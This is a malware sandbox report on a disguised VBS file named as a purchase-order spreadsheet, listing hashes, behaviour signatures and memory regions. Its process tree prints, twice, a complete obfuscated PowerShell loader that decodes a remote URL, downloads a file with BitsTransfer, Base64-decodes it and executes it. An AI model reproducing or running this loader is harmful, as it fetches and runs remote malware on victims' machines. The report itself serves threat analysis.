Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

1

PO-7100062 xlsx.vbs

windows7-x64

3

PO-7100062 xlsx.vbs

windows10-2004-x64

7

Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    12/10/2023, 12:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PO-7100062 xlsx.vbs

  • Size

    40KB

  • MD5

    352760d0c749c43f655d83aed8197db7

  • SHA1

    6e88ba7ed23563e930ae52a975a6d3164c114943

  • SHA256

    87cf48968b5c898324b399e1a241cc90ace231a1ba340387a373b4720198af82

  • SHA512

    b3a0cc6e7d9c9eabf5c2a56bc45fe991f053297c235f891faa3e312061a45ae7ecd758f887dac850e25e3d2aec1075b8596a0c256c65bb01c1c1842e517880dd

  • SSDEEP

    768:corMtwTVlHPwlR5EQi/Got7Vg4oOGmXpkzAiPhZeSC0GCG8x:coQqPwN6GoFV+VmZkkiDer7Ox

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO-7100062 xlsx.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Beost9 ([String]$Glend){For($Hvidglden=4; $Hvidglden -lt $Glend.Length-1; $Hvidglden+=(4+1)){$Jord=$Glend.Substring( $Hvidglden, 1);$luftfa+=$Jord};$luftfa;}$Bankb=Beost9 'AdduhConftCocitschip Sod:Benz/Deca/DisfsSievtKetceToldpGrubh BebeNymanBundmTiltiInduc AnthEstiaRedeeOverl SynsNearmCephimonttGevrhMono.StamcyamsoDehgmMuni/IschwPalipPret-VintiSchenPhlecUnrulPianu misd Genedvers Sti/FickaStresSpers vksePerit SnisOffe/ WarP EnduGloor EvopSign.LeukabasssVocoiEuph ';$luftfa01=Beost9 'Chemi OveeIdolxGenu ';$Pakvogn = Beost9 ' apt\ComesForeynonssPickwReoroDaadwSati6Jord4 Afd\EjerWironiTradn nondBarooOogrwTartsAnteP Mato EvawbeleeFirerJacoSRanihEnereAlonlDiosl Vir\TentvRets1slyn. bor0Cano\ OrdpscufoSyntwCataeAfskrCrissTakshPatae BnflFacal Brn.BruneSadaxRespePost ';.($luftfa01) (Beost9 'Joyp$ KopUEnteaSterfSkimsSleetDekltVandeFuncl Tal2Prst=Sacr$Ritue ParnFlitvJobb:Egnsw DefiFlagn Aded TveiWizarShad ') ;.($luftfa01) (Beost9 'Skif$RecePFakeaMedlkLaguvWateoTidsgSocin Fim= Int$BackUProjalavsfMetes GentKvaltscomeSletl Com2Vero+Ship$ groP legaposskMastvInheoJohngIndbnIdem ') ;.($luftfa01) (Beost9 'Gale$ FreGSinurZizzoIntouVild Lill= Cyk Nema( Gul(CampgLillwRefomColliBonn Egoiw ReliMetancomm3Chan2Yndl_ParapPararKjeloGrssc BeseEralsAgurs Ter Nonf- HjoFAdff PhysPSabbrMorpoHypecSpkkeCiphsLicks henIFemddValg=Enun$Kros{PoetP FlaISexuDSvei}Tret)Hotp.bilpCArteoPolym UnpmBetwaGustn WredWaggLKartipresnFleceResc) Sil Udpo- ModsPrecpPerilSvamiMinitDera Dri[SkemcSelrh Stia Repr swi]beer3Vati4Aste ');.($luftfa01) (Beost9 'Spol$ graPBaadlFirmaSomnyFlleeunlirUnsespumpdUnpr Bala=Adre Devo$vejrGBaasrUnisoWatcuCaco[Cond$ DobGprocrSkruo caruResh. milc Revo IriuSkumnUriatEden-Supe2Miss] Tou ');.($luftfa01) (Beost9 'Unsa$MeteYBreaaSandkDsnakMetaipetrnBesogMeti=shut( FalTUndee CrusIndttBree-EvolPfaksaPesttCollhTuri Tota$ perPPocka KlakTeltv Calofjerg KonnBoom)Unde unde-ChoaAKorrnBokad sti Tele(Clin[KirkIAfrenOutst RitPOvertTranr Thr]Cast:Bios:Sarcs StaiPasszPrehePate Forr-CyaneReglqPoli Pres8Rumm)Unen ') ;if ($Yakking) {.$Pakvogn $Playersd;} else {;$luftfa00=Beost9 'BlokSRiddtUnhua UndrSubtt Tan-NdskBUdstiPaaptTvansSamfT OpbrpliraHubrncozesNuzzfDrawe ColrLyso Unbe-VaarSGlotoGeryuAnnerNomicAutoeStvn Stig$fortBForhaOutdnNonfk Toob Dir Tjen-AlliDAnskeOutosForst Keri OplnCardaVerdt Puli SteoApprnNeij Oper$ForsUValeawoodfIsbjs Spot UnhtForneOverlPost2Over ';.($luftfa01) (Beost9 ' Sup$PhysUJeopabenkfForesAllet FintEnkeeSqualTrif2 Ver=Prin$HelmeDatinRevavGent:DirraHundpretspLretdIndgaBlomtPriaanonr ') ;.($luftfa01) (Beost9 'MesoIDeutmBaadp Haeo ForrRosatArge-RadiMCompoGraad Diau PholcirceIndf SemaBSystiPrimtComms SubTCowgrCircaKirknHjopsSnipf OveeSkolrDrik ') ;$Uafsttel2=$Uafsttel2+'\Videresen.Rek';while (-not $Bevidsthed170) {.($luftfa01) (Beost9 'Teph$paadBTekseStvlvSdebi VoddTelesUdsttNedkhTvaneNonfdOrga1Bugg7Mono0Jasp=Skip(NigeTEtere EctsStuntAngi-SkylPStemaDiamtFibrhKild Fol$unitURiteaShadfVingsMetrtStrit EgeeAlaclCena2Pala)Inve ') ;.($luftfa01) $luftfa00;.($luftfa01) (Beost9 'TyphSBehntRinga FilrFraftKoen-UntrSGoldlUrtieGsteeundepJern Outl5Ramp ');}.($luftfa01) (Beost9 'Anvi$ TauBCeleebrugoThees ErotHype Afg=Amag TresGTraneVelftObst-UnreCDailoUngonOrietJerneUnovnTuritTrlb Impo$FestUFunla helf UnmsRieht RuntVitae Brul Fis2Selv ');.($luftfa01) (Beost9 'Debu$ PapCScrio GjoiKamprBundsEquirpinshMemb Unde= Sur Fll[OverSDetryTidssPrsetVodkeBandm Eng.AzonCPostoAukjnHugovciffeGattrbetatVejt]Felt:Jvnh: SubFhvedrSkovoDybtmKultBAnglaHords urieAvic6Fict4UnreSJubltTabirSpidiStornForsgInds(Hove$GrafBEthiePreao StisPolyt Bef)Rege ');.($luftfa01) (Beost9 ' Scr$groul NaauFritfvexitGodsf DreaTabe2Fagd Mar= sel Smad[TeneSBrndyDemisSucktCenteLizbm Skr.FlydTVociePorcxRosatTour.UigeE FornSacrc DedoFoeldKondiSinunphocgKamp]Morf:Chif:PostANeglS skaCSeroIthegIappr.SubgG ReleOffetForeS BritKrnkrDelaiKirsnOutbgKnap(jepp$ DisCDuddo gafiSpler SpesLegerTilbhKurs)Benv ');.($luftfa01) (Beost9 ' Brn$NatiOSeksvModseThirrBrssm Difasammg lbetwarb= Evo$hjeml MiduFilmf PaatSkamfRebeaAlli2Vert.JapasSwatuMastbVerisSvaltGranr LonitabonCamegfuld(Opka2Deri5 Sca8Apos6Sent1 Tem5 Bor,Udgi2Spir7 Sig1Synk6Chop2Haan)Marx ');.($luftfa01) $Overmagt;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2864
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Beost9 ([String]$Glend){For($Hvidglden=4; $Hvidglden -lt $Glend.Length-1; $Hvidglden+=(4+1)){$Jord=$Glend.Substring( $Hvidglden, 1);$luftfa+=$Jord};$luftfa;}$Bankb=Beost9 'AdduhConftCocitschip Sod:Benz/Deca/DisfsSievtKetceToldpGrubh BebeNymanBundmTiltiInduc AnthEstiaRedeeOverl SynsNearmCephimonttGevrhMono.StamcyamsoDehgmMuni/IschwPalipPret-VintiSchenPhlecUnrulPianu misd Genedvers Sti/FickaStresSpers vksePerit SnisOffe/ WarP EnduGloor EvopSign.LeukabasssVocoiEuph ';$luftfa01=Beost9 'Chemi OveeIdolxGenu ';$Pakvogn = Beost9 ' apt\ComesForeynonssPickwReoroDaadwSati6Jord4 Afd\EjerWironiTradn nondBarooOogrwTartsAnteP Mato EvawbeleeFirerJacoSRanihEnereAlonlDiosl Vir\TentvRets1slyn. bor0Cano\ OrdpscufoSyntwCataeAfskrCrissTakshPatae BnflFacal Brn.BruneSadaxRespePost ';.($luftfa01) (Beost9 'Joyp$ KopUEnteaSterfSkimsSleetDekltVandeFuncl Tal2Prst=Sacr$Ritue ParnFlitvJobb:Egnsw DefiFlagn Aded TveiWizarShad ') ;.($luftfa01) (Beost9 'Skif$RecePFakeaMedlkLaguvWateoTidsgSocin Fim= Int$BackUProjalavsfMetes GentKvaltscomeSletl Com2Vero+Ship$ groP legaposskMastvInheoJohngIndbnIdem ') ;.($luftfa01) (Beost9 'Gale$ FreGSinurZizzoIntouVild Lill= Cyk Nema( Gul(CampgLillwRefomColliBonn Egoiw ReliMetancomm3Chan2Yndl_ParapPararKjeloGrssc BeseEralsAgurs Ter Nonf- HjoFAdff PhysPSabbrMorpoHypecSpkkeCiphsLicks henIFemddValg=Enun$Kros{PoetP FlaISexuDSvei}Tret)Hotp.bilpCArteoPolym UnpmBetwaGustn WredWaggLKartipresnFleceResc) Sil Udpo- ModsPrecpPerilSvamiMinitDera Dri[SkemcSelrh Stia Repr swi]beer3Vati4Aste ');.($luftfa01) (Beost9 'Spol$ graPBaadlFirmaSomnyFlleeunlirUnsespumpdUnpr Bala=Adre Devo$vejrGBaasrUnisoWatcuCaco[Cond$ DobGprocrSkruo caruResh. milc Revo IriuSkumnUriatEden-Supe2Miss] Tou ');.($luftfa01) (Beost9 'Unsa$MeteYBreaaSandkDsnakMetaipetrnBesogMeti=shut( FalTUndee CrusIndttBree-EvolPfaksaPesttCollhTuri Tota$ perPPocka KlakTeltv Calofjerg KonnBoom)Unde unde-ChoaAKorrnBokad sti Tele(Clin[KirkIAfrenOutst RitPOvertTranr Thr]Cast:Bios:Sarcs StaiPasszPrehePate Forr-CyaneReglqPoli Pres8Rumm)Unen ') ;if ($Yakking) {.$Pakvogn $Playersd;} else {;$luftfa00=Beost9 'BlokSRiddtUnhua UndrSubtt Tan-NdskBUdstiPaaptTvansSamfT OpbrpliraHubrncozesNuzzfDrawe ColrLyso Unbe-VaarSGlotoGeryuAnnerNomicAutoeStvn Stig$fortBForhaOutdnNonfk Toob Dir Tjen-AlliDAnskeOutosForst Keri OplnCardaVerdt Puli SteoApprnNeij Oper$ForsUValeawoodfIsbjs Spot UnhtForneOverlPost2Over ';.($luftfa01) (Beost9 ' Sup$PhysUJeopabenkfForesAllet FintEnkeeSqualTrif2 Ver=Prin$HelmeDatinRevavGent:DirraHundpretspLretdIndgaBlomtPriaanonr ') ;.($luftfa01) (Beost9 'MesoIDeutmBaadp Haeo ForrRosatArge-RadiMCompoGraad Diau PholcirceIndf SemaBSystiPrimtComms SubTCowgrCircaKirknHjopsSnipf OveeSkolrDrik ') ;$Uafsttel2=$Uafsttel2+'\Videresen.Rek';while (-not $Bevidsthed170) {.($luftfa01) (Beost9 'Teph$paadBTekseStvlvSdebi VoddTelesUdsttNedkhTvaneNonfdOrga1Bugg7Mono0Jasp=Skip(NigeTEtere EctsStuntAngi-SkylPStemaDiamtFibrhKild Fol$unitURiteaShadfVingsMetrtStrit EgeeAlaclCena2Pala)Inve ') ;.($luftfa01) $luftfa00;.($luftfa01) (Beost9 'TyphSBehntRinga FilrFraftKoen-UntrSGoldlUrtieGsteeundepJern Outl5Ramp ');}.($luftfa01) (Beost9 'Anvi$ TauBCeleebrugoThees ErotHype Afg=Amag TresGTraneVelftObst-UnreCDailoUngonOrietJerneUnovnTuritTrlb Impo$FestUFunla helf UnmsRieht RuntVitae Brul Fis2Selv ');.($luftfa01) (Beost9 'Debu$ PapCScrio GjoiKamprBundsEquirpinshMemb Unde= Sur Fll[OverSDetryTidssPrsetVodkeBandm Eng.AzonCPostoAukjnHugovciffeGattrbetatVejt]Felt:Jvnh: SubFhvedrSkovoDybtmKultBAnglaHords urieAvic6Fict4UnreSJubltTabirSpidiStornForsgInds(Hove$GrafBEthiePreao StisPolyt Bef)Rege ');.($luftfa01) (Beost9 ' Scr$groul NaauFritfvexitGodsf DreaTabe2Fagd Mar= sel Smad[TeneSBrndyDemisSucktCenteLizbm Skr.FlydTVociePorcxRosatTour.UigeE FornSacrc DedoFoeldKondiSinunphocgKamp]Morf:Chif:PostANeglS skaCSeroIthegIappr.SubgG ReleOffetForeS BritKrnkrDelaiKirsnOutbgKnap(jepp$ DisCDuddo gafiSpler SpesLegerTilbhKurs)Benv ');.($luftfa01) (Beost9 ' Brn$NatiOSeksvModseThirrBrssm Difasammg lbetwarb= Evo$hjeml MiduFilmf PaatSkamfRebeaAlli2Vert.JapasSwatuMastbVerisSvaltGranr LonitabonCamegfuld(Opka2Deri5 Sca8Apos6Sent1 Tem5 Bor,Udgi2Spir7 Sig1Synk6Chop2Haan)Marx ');.($luftfa01) $Overmagt;}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2708

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H7DQBO2D1OW3A93941FU.temp
    Filesize

    7KB

    MD5

    3c45feff1091674e1536287e9e211bf6

    SHA1

    dd133ad9da7a1a3d8b9d510d8558e8470e184d4b

    SHA256

    dc4edacd93be895d937e9276b2b59a6876fee4cffd905d9752ac8197444a853b

    SHA512

    ac83b53259957f1f8e4aafdc2d30a68ac3681614bf41b87117c2d1722a3f6388026ef7cba058aa7e52aa93d9134d632c6093c4b1c617b6019785c2516f9cecb6

    Download Submit

  • memory/2708-13-0x0000000073840000-0x0000000073DEB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2708-33-0x0000000002620000-0x0000000002660000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2708-32-0x0000000073840000-0x0000000073DEB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2708-31-0x0000000073840000-0x0000000073DEB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2708-16-0x0000000002620000-0x0000000002660000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2708-15-0x0000000002620000-0x0000000002660000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2708-14-0x0000000073840000-0x0000000073DEB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2864-9-0x0000000002360000-0x00000000023E0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2864-10-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2864-4-0x000000001B250000-0x000000001B532000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2864-8-0x0000000002360000-0x00000000023E0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2864-26-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2864-28-0x0000000002360000-0x00000000023E0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2864-27-0x0000000002360000-0x00000000023E0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2864-29-0x0000000002360000-0x00000000023E0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2864-30-0x0000000002360000-0x00000000023E0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2864-7-0x0000000002360000-0x00000000023E0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2864-6-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2864-5-0x0000000001E60000-0x0000000001E68000-memory.dmp

    Filesize

    32KB

    Download